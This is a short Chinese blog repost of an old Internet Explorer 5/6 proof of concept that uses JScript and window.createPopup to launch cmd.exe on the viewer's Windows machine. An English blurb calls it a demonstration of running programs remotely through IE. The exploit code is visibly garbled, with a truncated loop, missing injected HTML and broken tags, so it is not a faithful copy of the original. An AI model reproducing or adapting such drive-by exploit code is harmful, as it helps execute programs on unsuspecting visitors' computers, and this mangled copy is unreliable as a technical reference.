忘了是哪个网站上抄下来的了,javascript运行客户端exe程序

作者:袖梨 2022-06-30

PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


IE6 security...


T language=JScript>
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n html+="";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}



Hmm, let's start a command shell...



This page doesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!



Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.

相关文章

精彩推荐